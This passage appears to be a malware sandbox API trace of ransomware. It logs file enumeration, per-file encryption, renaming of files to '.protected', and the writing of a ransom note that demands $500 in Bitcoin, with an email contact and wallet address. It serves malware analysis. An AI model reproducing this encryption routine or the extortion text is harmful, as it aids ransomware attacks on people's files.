lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.protected" (normalized: "c:\\users\\public\\music\\desktop.ini.protected")) returned 1 [0095.582] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="Windows") returned -1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="Program Files") returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="Program Files (x86)") returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="$Recycle.bin") returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="System Volume Information") returned -1 [0095.582] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned 38 [0095.582] lstrcmpW (lpString1="Sample Music", lpString2=".") returned 1 [0095.582] lstrcmpW (lpString1="Sample Music", lpString2="..") returned 1 [0095.582] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*") returned 40 [0095.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.635] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.635] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.635] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.635] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.635] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.635] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\.") returned 40 [0095.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.635] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.635] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.635] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.635] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\." (normalized: "c:\\users\\public\\music\\sample music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.635] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.635] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.635] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.635] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.635] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.635] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.635] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\..") returned 41 [0095.635] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.635] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.636] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\.." (normalized: "c:\\users\\public\\music"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.636] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.636] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.636] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.636] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.637] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.637] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.637] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.637] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.637] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.637] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.637] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x24a, lpOverlapped=0x0) returned 1 [0095.638] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.638] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x24a, lpOverlapped=0x0) returned 1 [0095.638] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.638] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.638] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.638] CloseHandle (hObject=0xd4) returned 1 [0095.639] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.protected") returned 60 [0095.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.protected" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.protected")) returned 1 [0095.640] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="Windows") returned -1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="Program Files") returned -1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="Program Files (x86)") returned -1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="$Recycle.bin") returned 1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="System Volume Information") returned -1 [0095.640] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.640] StrStrIW (lpFirst="Kalimba.mp3", lpSrch=".protected") returned 0x0 [0095.640] lstrcmpW (lpString1="Kalimba.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0095.640] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.641] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.641] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".txt") returned 0x0 [0095.641] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.641] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".rar") returned 0x0 [0095.641] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.641] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".zip") returned 0x0 [0095.641] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.659] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.659] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.660] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.660] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.674] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.674] CloseHandle (hObject=0xd4) returned 1 [0095.683] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.protected") returned 60 [0095.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.protected" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.protected")) returned 1 [0095.684] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="Windows") returned -1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="Program Files") returned -1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="Program Files (x86)") returned -1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="$Recycle.bin") returned 1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="System Volume Information") returned -1 [0095.684] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.684] StrStrIW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".protected") returned 0x0 [0095.684] lstrcmpW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0095.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.685] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.685] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".txt") returned 0x0 [0095.685] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.685] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".rar") returned 0x0 [0095.685] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.685] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".zip") returned 0x0 [0095.685] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.698] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.698] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.698] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.698] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.699] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.700] CloseHandle (hObject=0xd4) returned 1 [0095.700] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.protected") returned 78 [0095.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.protected" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.protected")) returned 1 [0095.701] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="Windows") returned -1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="Program Files") returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="Program Files (x86)") returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="$Recycle.bin") returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="System Volume Information") returned -1 [0095.701] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.701] StrStrIW (lpFirst="Sleep Away.mp3", lpSrch=".protected") returned 0x0 [0095.701] lstrcmpW (lpString1="Sleep Away.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0095.701] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.701] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.727] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.727] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".txt") returned 0x0 [0095.727] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.727] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".rar") returned 0x0 [0095.727] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.727] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".zip") returned 0x0 [0095.727] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.736] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.736] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.736] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.736] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.759] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.759] CloseHandle (hObject=0xd4) returned 1 [0095.759] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.protected") returned 63 [0095.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.protected" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.protected")) returned 1 [0095.760] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.760] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.760] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES.txt") returned 56 [0095.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\music\\sample music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.761] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.761] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.761] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.761] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.761] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.761] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.761] CloseHandle (hObject=0xb4) returned 1 [0095.762] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.762] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.762] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\RESTORE_FILES.txt") returned 43 [0095.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.763] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: 